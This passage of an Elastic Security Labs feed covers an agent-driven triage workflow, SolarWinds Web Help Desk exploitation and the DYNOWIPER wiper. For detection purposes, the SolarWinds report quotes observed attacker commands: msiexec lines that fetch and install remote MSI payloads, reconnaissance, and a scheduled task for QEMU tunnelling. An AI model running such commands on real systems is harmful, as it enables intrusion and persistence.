<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image1.png" alt="Shows the agent's reasoning chain: starting with VirusTotal lookup on the file hash, then generating an ES|QL query to search endpoint logs for the affected host, user, and malicious processes. Demonstrates autonomous tool selection." /></p>
<p><strong>Step 1: VirusTotal Lookup</strong>: <code>vt.hash.lookup</code></p>
<ul>
<li>The agent's first move: verify the malware hash.</li>
</ul>
<p><strong>Step 2: Generate ES|QL Query</strong>: <code>platform.core.generate_esql</code></p>
<ul>
<li>With malware confirmed, the agent searched for all related activity.</li>
</ul>
<p><strong>Step 3: Product Documentation</strong>: <code>platform.core.product_documentation</code></p>
<ul>
<li>The agent referenced Elastic Security docs to generate remediation commands for the Response Console.!</li>
</ul>
<p><a href="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image3.png">Reasoning steps showing which tools were called in sequence for transparency</a></p>
<p><em>Shows the additional reasoning chain: referencing product documentation, then checking the on-call schedule information before creating a case with all relevant information and notifying the analyst on call over Slack.</em></p>
<p><strong>Step 4: Check current time:</strong> <code>get.time</code></p>
<p><strong>Step 5: Check On-Call Schedule</strong>: <code>check.on.call.schedule</code></p>
<ul>
<li>The agent ran an ES|QL query against the <code>on-call-schedule</code> index to find the current responder:</li>
</ul>
<p><strong>Step 6: Create Case</strong>: <code>create.case</code></p>
<p><strong>Step 7: Create Slack Channel</strong>: <code>create.channel</code></p>
<h3>Why this matters</h3>
<p>The agent wasn't following a script. It <strong>reasoned</strong> about the situation and decided:</p>
<ol>
<li>First, verify the malware is real (VirusTotal)</li>
<li>Then, understand the impact (ES|QL log search)</li>
<li>Then, figure out how to remediate (product documentation)</li>
<li>Then, find the right person to respond (on-call schedule)</li>
<li>Then, create tracking artifacts (case)</li>
<li>Finally, coordinate the team (Slack channel)</li>
</ol>
<p>This is the difference between a workflow (which follows a fixed sequence) and an agent (which reasons about what to do next). The workflow triggered the agent; the agent figured out the rest.</p>
<h2>Step 3: Automated incident response</h2>
<p>With high-confidence confirmation, the workflow automatically:</p>
<h3>1. Creates an incident Case</h3>
<p>A structured case is created with all relevant evidence attached:</p>
<ul>
<li>Attack Discovery findings</li>
<li>VirusTotal analysis results</li>
<li>Threat intelligence matches</li>
<li>Agent Builder analysis</li>
<li>Recommended response actions</li>
</ul>
<h3>2. Notifies the SOC</h3>
<p>A Slack message is sent to the right channel informing analysts of the critical incident.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image5.png" alt="Shows the actual Slack channel with the Incident Bot  posting the full attack summary, malware details, attack chain, MITRE ATT&amp;CK mapping, and immediate next steps." /></p>
<h3>3. Enables Response Actions</h3>
<p>The workflow can optionally trigger automated response actions:</p>
<ul>
<li><strong>Host Isolation:</strong> Isolate <code>srv-win-defend-01</code> via Elastic Defend</li>
<li><strong>User Suspension:</strong> Disable <code>james_spiteri</code> in Active Directory</li>
<li><strong>Network Block:</strong> Push C2 domain to firewall blocklist</li>
<li><strong>IOC Sweep:</strong> Launch fleet-wide scan for Chrysalis indicators</li>
</ul>
<hr />
<h2>Time-to-confirmation: Before and after</h2>
<table>
<thead>
<tr>
<th align="left">Metric</th>
<th align="left">Manual Process</th>
<th align="left">Automated Pipeline</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Alert Correlation</td>
<td align="left">30-60 minutes</td>
<td align="left">Instant (Attack Discovery)</td>
</tr>
<tr>
<td align="left">IOC Extraction</td>
<td align="left">15-30 minutes</td>
<td align="left">Instant (Workflow)</td>
</tr>
<tr>
<td align="left">VirusTotal Lookup</td>
<td align="left">10-15 minutes</td>
<td align="left">5 seconds (API)</td>
</tr>
<tr>
<td align="left">Threat Intel Correlation</td>
<td align="left">30-60 minutes</td>
<td align="left">10 seconds (ES</td>
</tr>
<tr>
<td align="left">Attack Attribution</td>
<td align="left">1-4 hours</td>
<td align="left">30 seconds (Agent Builder)</td>
</tr>
<tr>
<td align="left">Incident Creation</td>
<td align="left">15-30 minutes</td>
<td align="left">Instant (Workflow)</td>
</tr>
<tr>
<td align="left">SOC Notification</td>
<td align="left">5-10 minutes</td>
<td align="left">Instant (Connector)</td>
</tr>
<tr>
<td align="left"><strong>Total Time</strong></td>
<td align="left"><strong>2-6 hours</strong></td>
<td align="left"><strong>&lt; 4 minutes</strong></td>
</tr>
</tbody>
</table>
<hr />
<h2>The other path: Just ask the Agent</h2>
<p>Everything above describes the <strong>automated</strong> pipeline - Attack Discovery finds the threat, the workflow fires, the agent triages it, and the right analyst(s) gets notified.</p>
<p>But there's another equally powerful way to use this: go directly to Agent Builder and ask it in plain English.</p>
<h3>Scenario: You read about the threat first</h3>
<p>Imagine you're scrolling through your threat intel feeds and see Rapid7's blog post about the Chrysalis backdoor. You just want to know: <em>are we compromised?</em></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image9.png" alt="" /></p>
<p>That's it. The same agent with the same tools does the rest:</p>
<ol>
<li>Reads the threat report using the <code>web.search</code> tool to pull IOCs and TTPs from the Rapid7 blog</li>
<li>Generates ES|QL queries to hunt for Chrysalis indicators across your file, network, and process event logs</li>
<li>Checks VirusTotal for any matching file hashes found in your environment</li>
<li>Produces a CISO-ready summary with findings, confidence level, and recommended actions</li>
</ol>
<p>The agent calls the same tools it would in the automated pipeline. The difference is the entry point: instead of a scheduled Attack Discovery triggering a workflow, you triggered the agent with a question.</p>
<h3>Why this changes the game for analysts</h3>
<p>This is the part that's easy to overlook but profoundly important: <strong>the analyst didn't need to know a single query language, index pattern, or tool name</strong>.</p>
<p>They didn't write ES|QL. They didn’t need to remember where their different data lives. They didn't need to remember the VirusTotal API syntax or figure out which threat intel index to query.</p>
<p>They asked a question in natural language. The agent figured out the rest including which indices to search, which queries to write, which tools to call, and how to synthesize the results.</p>
<p>For a junior analyst who joined the team last month, this is transformative. For a senior analyst who's been doing this for a decade, it's hours of their life back. For a CISO who wants a status update, it's a question away.</p>
<p>The barrier to effective threat hunting just dropped from &quot;knows ES|QL and 47 index patterns&quot; to &quot;can describe what they're looking for.&quot;</p>
<h2>Key takeaways</h2>
<ol>
<li><strong>Attack Discovery on a schedule means you don't miss attacks</strong> - it continuously analyzes your alerts, so coordinated threats get surfaced even when no one is watching the queue.</li>
<li><strong>Workflows</strong> orchestrate the response, triggering on discoveries, invoking agents, executing actions.</li>
<li><strong>Agent Builder lets you build or extend agents for your needs</strong> - whether you start from scratch or add custom tools to an existing agent, you shape the capabilities to match your environment.</li>
<li><strong>Agents reason, workflows execute</strong> - the agent autonomously decided to call VirusTotal, search logs, check the on-call schedule, and create a Slack channel. No human scripted that sequence.</li>
<li><strong>Two entry points, same power</strong> - the automated pipeline and the chat interface use the same agent and the same tools. Whether a scheduled discovery triggers it or an analyst asks a question, the outcome is the same.</li>
<li><strong>Natural language is the new query language</strong> - analysts don't need to know ES|QL, index patterns, or API syntax. They describe what they're looking for, and the agent handles the rest.</li>
</ol>
<p>The Chrysalis backdoor campaign demonstrates why this matters. When nation-state actors can compromise your supply chain and establish persistence in 4 seconds, you need defenses that can match that speed - whether that's an automated pipeline running while you sleep, or a direct conversation with an agent when you're the first to spot the threat.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/photo-edited-08.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[SolarWinds Web Help Desk Exploitation - February 2026]]></title>
            <link>https://www.elastic.co/security-labs/solarwinds-whd-exploitation</link>
            <guid>solarwinds-whd-exploitation</guid>
            <pubDate>Tue, 10 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security detection and prevention capabilities for the recently-disclosed SolarWinds Web Help Desk vulnerabilities.]]></description>
            <content:encoded><![CDATA[<h2>Summary</h2>
<ul>
<li>On February 6, 2026, Microsoft <a href="https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/">reported</a> the exploitation of <a href="https://www.solarwinds.com/web-help-desk">SolarWinds Web Help Desk</a> (WHD) servers</li>
<li>The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access</li>
<li>While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399">CVE-2025-26399</a>, <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536">CVE-2025-40536</a>, and <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551">CVE-2025-40551</a></li>
<li>Elastic Security Labs does not observe telemetry events related to this activity as of the date of this publication</li>
<li>Elastic Defend provides comprehensive visibility, along with 5 prebuilt prevention and 11 prebuilt detection capabilities across this reported activity</li>
</ul>
<h2>Background</h2>
<p>Multiple intrusions have been publicly reported starting on February 6, 2026 stemming from Internet-connected servers utilizing SolarWinds Web Help Desk <a href="https://support.solarwinds.com/web-help-desk">software</a>. This exploitation activity reportedly first occurred in December 2025.</p>
<p>Given the number of recent CVEs affecting this product, it’s not yet clear which of several CVEs is directly responsible for these campaigns. Below are the CVEs involved in this reported activity:</p>
<ul>
<li><code>CVE-2025-26399</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399">SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution Vulnerability</a></li>
<li><code>CVE-2025-40536</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536">SolarWinds Web Help Desk Security Control Bypass Vulnerability</a></li>
<li><code>CVE-2025-40551</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551">SolarWinds Web Help Desk Deserialization of Untrusted Data Remote Code Execution Vulnerability</a></li>
</ul>
<p>Below is a table of the vulnerability descriptions and the impacted product versions:</p>
<table>
<thead>
<tr>
<th align="left">Vulnerability ID</th>
<th align="left">Vulnerability Description</th>
<th align="left">Affected Products</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">CVE-2025-26399</td>
<td align="left">Unauthenticated AjaxProxy deserialization remote code execution vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.7 and all previous versions</td>
</tr>
<tr>
<td align="left">CVE-2025-40536</td>
<td align="left">Susceptible to a security control bypass vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions</td>
</tr>
<tr>
<td align="left">CVE-2025-40551</td>
<td align="left">Untrusted data deserialization vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions</td>
</tr>
</tbody>
</table>
<p>After exploitation, the threat actors are documented to have abused otherwise legitimate RMM software to gain persistent access to victim environments. Additional reporting noted the use of <a href="https://docs.velociraptor.app/">Velociraptor</a> being abused for post-compromise execution, such as disabling Microsoft Defender and setting up a Cloudflare tunnel.</p>
<p>Once the TAs had gained network access, they configured a scheduled task to start a QEMU virtual system to maintain remote access. Credential dumping activity was also observed, including the use of DCSync and the extraction of the <code>NTDS.dit</code> database from a Windows domain controller.</p>
<p>The following sections detail Elastic Security detection and prevention rules that can detect and mitigate these intrusive activities.</p>
<h2>Execution Flow</h2>
<h3>Initial access</h3>
<p>Following the successful exploitation of the SolarWinds Web Help Desk (WHD), the threat actors established an interactive shell. Observations indicate a heavy reliance on &quot;living-off-the-land&quot; (LotL) techniques, where legitimate system utilities and programs such as RMMs are used to perform malicious actions.</p>
<p>The original attack chain happens from the WHD service wrapper (<code>wrapper.exe</code>) spawning <code>java.exe</code> which then spawns the Windows command processor (<code>cmd.exe</code>). An Elastic SIEM rule has been <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_potential_webhelpdesk_exploit.toml">created</a> for the community to detect unusual child process activity from the SolarWinds Web Help Desk application.</p>
<pre><code>any where host.os.type == &quot;windows&quot; and
(
 (event.category == &quot;library&quot; and
  process.executable : (&quot;C:\\Program Files\\WebHelpDesk\\*\\java.exe&quot;, &quot;C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe&quot;) and
  (dll.path : &quot;\\Device\\Mup\\*&quot; or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or

 (event.category == &quot;process&quot; and process.name : (&quot;cmd.exe&quot;, &quot;powershell.exe&quot;, &quot;rundll32.exe&quot;) and
  process.parent.executable : (&quot;C:\\Program Files\\WebHelpDesk\\*\\java*.exe&quot;, &quot;C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe&quot;))
)
</code></pre>
<p><em>SIEM Rule - Suspicious SolarWinds Web Help Desk Java Module Load or Child Process</em></p>
<p>One of the initial attack chains involved installing a remotely-hosted MSI installer from an anonymous file-hosting service called <a href="https://catbox.moe/">Catbox</a>.  The following command-line was observed:</p>
<pre><code>msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
</code></pre>
<p>In order to detect this activity, Elastic has a SIEM prebuilt rule to detect remote installation of MSI files <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_msiexec_remote_payload.toml">here</a>, and an endpoint behavior protection <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">here</a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image2.png" alt="Alert - Remote File Execution via MSIEXEC" /></p>
<p>Suspicious child processes from Java and SolarWinds WHD represent the earliest phase of this attack, which resulted in the installation of an RMM MSI file. This remote monitoring and management utility provides some of the functionality of a conventional backdoor while resembling benign administrative software.</p>
<h3>Discovery</h3>
<p>After the RMM agent was configured, the threat group moved to hands-on keyboard activity performing reconnaissance and discovery within the network.<br />
They then leveraged the RMM agent tooling to perform discovery within the Windows network executing commands targeting information related to Active Directory. An observed command line is shown below:</p>
<pre><code>net group &quot;domain computers&quot; /do
</code></pre>
<p>An existing SIEM rule designed to identify Windows account group discovery detects this reconnaissance technique and is available <a href="https://github.com/elastic/detection-rules/blob/main/rules_building_block/discovery_generic_account_groups.toml">here</a>.</p>
<h3>Evasion</h3>
<p>One of the more notable choices used by the threat actor in one campaign was the usage of open-source forensic tool, <a href="https://github.com/Velocidex/velociraptor">Velociraptor</a>. While this legitimate tool is traditionally used to collect forensic artifacts from endpoints, the adversaries used it for code execution and file staging. The threat group silently installed Velociraptor using the remote MSI command shown below and a prebuilt Elastic Security rule is available:</p>
<pre><code>msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
</code></pre>
<p>They followed this up with an installation of the Cloudflare Tunnel <a href="https://github.com/cloudflare/cloudflared">client</a> (<code>Cloudflared</code>) with the following command:</p>
<pre><code>msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
</code></pre>
<p>Echoing trends observed throughout 2025 and described in the <a href="https://www.elastic.co/security-labs/elastic-publishes-2025-global-threat-report">Elastic Global Threat Report</a>, adversaries increasingly abuse trusted networks for transport encryption and to take advantage of benign reputation. The remote MSI installation rules discussed earlier in this article also apply in this case; however, installing a legitimate security tool is likely to appear benign to many enterprises. Cisco Talos has previously <a href="https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/">highlighted</a> this emerging attacker trend involving the use of Velociraptor for post-compromise activity.</p>
<p>Other observations in this intrusion set included the threat actor disabling security controls such as Windows Defender and Window Firewall through registry key modifications.  Existing Elastic <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_disabled_via_registry.toml">SIEM</a> and <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_windows_defender_registry_modification.toml">endpoint</a> rules identify these attempts to undermine security settings.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image3.png" alt="Alert - Microsoft Windows Defender Tampering" /></p>
<h3>Persistence</h3>
<p>In order to maintain continued access, the threat actors set up a Windows scheduled task using the following command-line:</p>
<pre><code>SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN &quot;TPMProfiler&quot; /TR        &quot;C:\Users\&lt;user&gt;\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -        device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22&quot;
&lt;/user&gt;
</code></pre>
<p>This scheduled task named <code>TPMProfiler</code> was configured to execute <a href="https://www.qemu.org/">QEMU</a>, a system-level virtualization and emulation tool. QEMU was then used to establish an SSH connection, facilitating continued access to the compromised system.</p>
<p>Elastic Security published and maintains a SIEM detection <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_local_scheduled_job_creation.toml">rule</a> to detect the creation of this scheduled task.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image1.png" alt="Alert - Persistence via Scheduled Job Creation" /></p>
<p>In order to detect the QEMU tunnelling activity, Elastic Security has this Elastic Defend rule <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_potential_traffic_tunneling_with_qemu.toml">here</a> and an Elastic prebuilt detection rule <a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_tunnel_qemu.toml">here</a>.</p>
<h3>Credential Access</h3>
<p>As part of these attacks, Microsoft also mentioned credential dumping of the Active Directory Domain Database (<code>ntds.dit</code>). Elastic provides multiple detections for this behavior, including the rules referenced <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml">here</a> and <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml">here</a>.</p>
<h3>Recommendations</h3>
<ol>
<li>Apply the latest SolarWinds Web Help Desk patches.</li>
<li>Rotate all service and administrative credentials that are associated with SolarWinds Web Help Desk.</li>
<li>Conduct host-level reviews of any impacted servers and endpoints to identify unauthorized activity.</li>
<li>Identify and remove any RMM usage associated with this activity. Review organizational policy and monitoring strategies for RMM tools.</li>
</ol>
<h3>Detecting SolarWinds WHD exploitation</h3>
<h4>Elastic Security prebuilt detection rules</h4>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_potential_webhelpdesk_exploit.toml">Suspicious SolarWinds Web Help Desk Java Module Load or Child Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_msiexec_remote_payload.toml">Potential Remote Install via MsiExec</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">Remote File Execution via MSIEXEC</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules_building_block/discovery_generic_account_groups.toml">Windows Account or Group Discovery</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_disabled_via_registry.toml">Windows Defender Disabled via Registry Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_local_scheduled_job_creation.toml">Persistence via Scheduled Job Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml">NTDS or SAM Database File Copied</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml">Potential Credential Access via Windows Utilities</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/793d79b0637135298c821a762a98312ad7f3c7d1/rules/windows/command_and_control_tunnel_vscode.toml#L39">Attempt to Establish VScode Remote Tunnel</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/windows/command_and_control_new_terms_commonly_abused_rat_execution.toml#L26">First Time Seen Commonly Abused Remote Access Tool Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_tunnel_qemu.toml">Potential Traffic Tunneling using QEMU</a></li>
</ul>
<h4>Elastic Defend prebuilt prevention rules</h4>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">Remote File Execution via MSIEXEC</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_windows_defender_registry_modification.toml">Suspicious Windows Defender Registry Modification</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/7ad65c2cfca7a6c54c74dbe6206e968234209f94/behavior/rules/windows/command_and_control_potential_traffic_tunneling_with_qemu.toml#L3">Potential Traffic Tunneling with QEMU</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_webservice_lolbas.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/7ad65c2cfca7a6c54c74dbe6206e968234209f94/behavior/rules/cross-platform/execution_attempt_to_establish_vscode_remote_tunnel.toml#L16">Attempt to establish VScode Remote Tunnel</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/">https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/</a></li>
</ul>
<h3>MITRE ATT&amp;CK Mapping</h3>
<table>
<thead>
<tr>
<th align="left">Tactic</th>
<th align="left">Technique</th>
<th align="left">ID</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Initial Access</td>
<td align="left">Exploit Public-Facing Application</td>
<td align="left">T1190</td>
</tr>
<tr>
<td align="left">Execution</td>
<td align="left">PowerShell</td>
<td align="left">T1059.001</td>
</tr>
<tr>
<td align="left">Lateral Movement</td>
<td align="left">Remote Service Session Hijacking</td>
<td align="left">T1563</td>
</tr>
<tr>
<td align="left">Credential Access</td>
<td align="left">OS Credential Dumping: LSASS Memory</td>
<td align="left">T1003.001</td>
</tr>
<tr>
<td align="left">Persistence</td>
<td align="left">Scheduled Task/Job</td>
<td align="left">T1053.005</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/photo-edited-10.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[DYNOWIPER: Destructive Malware Targeting Poland's Energy Sector]]></title>
            <link>https://www.elastic.co/security-labs/dynowiper</link>
            <guid>dynowiper</guid>
            <pubDate>Fri, 06 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how Elastic Defend's ransomware protection successfully detects and prevents DYNOWIPER execution using canary file monitoring.]]></description>
            <content:encoded><![CDATA[<h2>Summary</h2>
<ul>
<li>On December 29, 2025, a coordinated campaign of destructive cyberattacks targeted Poland's energy infrastructure, affecting over 30 renewable energy facilities and a major combined heat and power (CHP) plant</li>
<li>A custom wiper malware dubbed DYNOWIPER was used to irreversibly destroy data across compromised networks</li>
<li><a href="https://mwdb.cert.pl/">CERT Polska</a> attributes the attack infrastructure to the threat cluster Cisco refers to as Static Tundra, Crowdstrike refers to as Berserk Bear, Microsoft calls Ghost Blizzard, and Symantec labels as Dragonfly</li>
<li>Elastic Defend's ransomware protection successfully detects and prevents DYNOWIPER execution using canary file monitoring</li>
</ul>
<h2>Background</h2>
<p>The coordinated destructive campaign against critical energy infrastructure occurred on December 29, 2025, during a period of severe winter weather in Poland.</p>
<p>According to CERT Polska’s report, the campaign targeted:</p>
<ul>
<li>30+ wind and solar farms across Poland</li>
<li>A major CHP plant  supplying heat to nearly half a million customers</li>
<li>A manufacturing sector company characterized as an opportunistic target</li>
</ul>
<h3>Attack Vector</h3>
<p>The threat actor reportedly gained initial access through Fortinet FortiGate devices exposed to the internet prior to December 29th, exploiting:</p>
<ul>
<li>VPN interfaces allowing authentication without multi-factor authentication</li>
<li>Reused credentials across multiple facilities</li>
<li>Historical vulnerabilities in unpatched devices</li>
</ul>
<p>Attackers conducted months-long reconnaissance of industrial automation systems, specifically targeting SCADA systems and OT networks. During this time, they exfiltrated Active Directory databases, FortiGate configurations, and data related to OT network modernization.</p>
<h2>DYNOWIPER Details</h2>
<p>Elastic Security Labs independently analyzed a DYNOWIPER sample from open sources. The sample is similar to one of the variants documented by CERT Polska.</p>
<h3>Sample Metadata</h3>
<table>
<thead>
<tr>
<th>Property</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>SHA256</strong></td>
<td><code>835b0d87ed2d49899ab6f9479cddb8b4e03f5aeb2365c50a51f9088dcede68d5</code></td>
</tr>
<tr>
<td><strong>SHA1</strong></td>
<td><code>4ec3c90846af6b79ee1a5188eefa3fd21f6d4cf6</code></td>
</tr>
<tr>
<td><strong>MD5</strong></td>
<td><code>a727362416834fa63672b87820ff7f27</code></td>
</tr>
<tr>
<td><strong>File Type</strong></td>
<td>Windows PE32 Executable (GUI)</td>
</tr>
<tr>
<td><strong>Architecture</strong></td>
<td>32-bit x86</td>
</tr>
<tr>
<td><strong>File Size</strong></td>
<td>167,424 bytes</td>
</tr>
<tr>
<td><strong>Compiler</strong></td>
<td>Visual C++ (MSVC)</td>
</tr>
<tr>
<td><strong>Compilation Date</strong></td>
<td>2025-12-26 13:51:11 UTC</td>
</tr>
</tbody>
</table>
<h3>Destruction Mechanism</h3>
<h4>Drive Enumeration</h4>
<p>The malware enumerates all logical drives (A-Z) using <code>GetLogicalDrives()</code> and targets only <code>DRIVE_FIXED</code> (hard drives) and <code>DRIVE_REMOVABLE</code> (USB drives, SD cards) types.</p>
<h4>File Corruption</h4>
<p>DYNOWIPER employs a Mersenne Twister PRNG to generate pseudorandom data for file corruption. Rather than overwriting entire files (which requires time), it strategically corrupts files by:</p>
<ol>
<li>Removing file protection attributes via <code>SetFileAttributesW(FILE_ATTRIBUTE_NORMAL)</code></li>
<li>Opening files with <code>CreateFileW</code> for read/write access</li>
<li>Overwriting the file header with 16 bytes of random data</li>
<li>For larger files, generating up to 4,096 random offsets and overwriting each with 16-byte sequences</li>
</ol>
<p>This approach allows rapid corruption of many files while ensuring data is unrecoverable.</p>
<h4>Directory Exclusion List</h4>
<p>The malware deliberately avoids system-critical directories to maintain system stability during the attack:</p>
<ul>
<li><code>windows</code>, <code>system32</code></li>
<li><code>program files</code>, <code>program files(x86)</code></li>
<li><code>boot</code>, <code>appdata</code>, <code>temp</code></li>
<li><code>recycle.bin</code>, <code>$recycle.bin</code></li>
<li><code>perflogs</code>, <code>documents and settings</code></li>
</ul>
<p>This design choice maximizes data destruction <em>before</em> the system becomes unstable, ensuring the wiper completes its mission.</p>
<h4>Forced Reboot</h4>
<p>After corruption and deletion phases complete, DYNOWIPER:</p>
<ol>
<li>Obtains a process token via <code>OpenProcessToken()</code></li>
<li>Enables <code>SeShutdownPrivilege</code> via <code>AdjustTokenPrivileges()</code></li>
<li>Forces system reboot with <code>ExitWindowsEx(EWX_REBOOT | EWX_FORCE)</code></li>
</ol>
<h3>Notable Characteristics</h3>
<p>DYNOWIPER is distinguished by several characteristics:</p>
<ul>
<li>No persistence mechanism - The malware does not attempt to survive reboots</li>
<li>No C2 communication - Completely standalone, no network callbacks</li>
<li>No shell command invocations - All operations performed via Windows API</li>
<li>No anti-analysis techniques - No attempts to evade detection or debugging</li>
<li>Characteristic PDB path: <code>C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb</code></li>
</ul>
<p>The use of &quot;vagrant&quot; in the PDB path suggests development occurred in a Vagrant-managed virtual machine environment.</p>
<h3>Version Differences</h3>
<p>CERT Polska documented two DYNOWIPER versions (A and B). The sample we analyzed corresponds to version A. Version B removed the system shutdown functionality and added a 5-second sleep between corruption and deletion phases.</p>
<h2>Elastic Defend Protection</h2>
<p>During testing of DYNOWIPER samples, Elastic Defend successfully detected and mitigated the malware before it could cause damage.</p>
<h3>Detection Alert</h3>
<pre><code class="language-json">{  
  &quot;message&quot;: &quot;Ransomware Prevention Alert&quot;,  
  &quot;event&quot;: {  
    &quot;code&quot;: &quot;ransomware&quot;,  
    &quot;action&quot;: &quot;canary-activity&quot;,  
    &quot;type&quot;: [&quot;info&quot;, &quot;start&quot;, &quot;change&quot;, &quot;denied&quot;],  
    &quot;category&quot;: [&quot;malware&quot;, &quot;intrusion_detection&quot;, &quot;process&quot;, &quot;file&quot;],  
    &quot;outcome&quot;: &quot;success&quot;  
  },  
  &quot;Ransomware&quot;: {  
    &quot;feature&quot;: &quot;canary&quot;,  
    &quot;version&quot;: &quot;1.9.0&quot;  
  }  
}  
</code></pre>
<h3>How Canary Protection Works</h3>
<p>Elastic Defend's ransomware protection employs canary files (strategically placed decoy files) that trigger alerts when modified. DYNOWIPER's indiscriminate file corruption approach caused it to modify a canary file.</p>
<p>When the wiper attempted to corrupt this canary file, Elastic Defend immediately:</p>
<ol>
<li>Detected the suspicious modification pattern</li>
<li>Blocked further execution</li>
<li>Generated a high-confidence ransomware alert (risk score: 73)</li>
</ol>
<p>While Elastic Defend was not the EDR solution used in this incident, this form of defense-in-depth protection was critical in the real-world intrusion. According to CERT Polska, the EDR solution deployed at the CHP plant, using the same canary protection technology highlighted above, halted data overwriting on more than 100 machines where DYNOWIPER had already begun executing.</p>
<h2>Why Behavioral Detection is Crucial</h2>
<p>Destructive malware can present unique challenges to minimizing risk:</p>
<ul>
<li>They may not establish C2 connections (no network indicators)</li>
<li>They may not use persistence mechanisms (limited forensic artifacts)</li>
<li>They execute quickly and destructively</li>
<li>Static signature-based detection may miss new variants</li>
</ul>
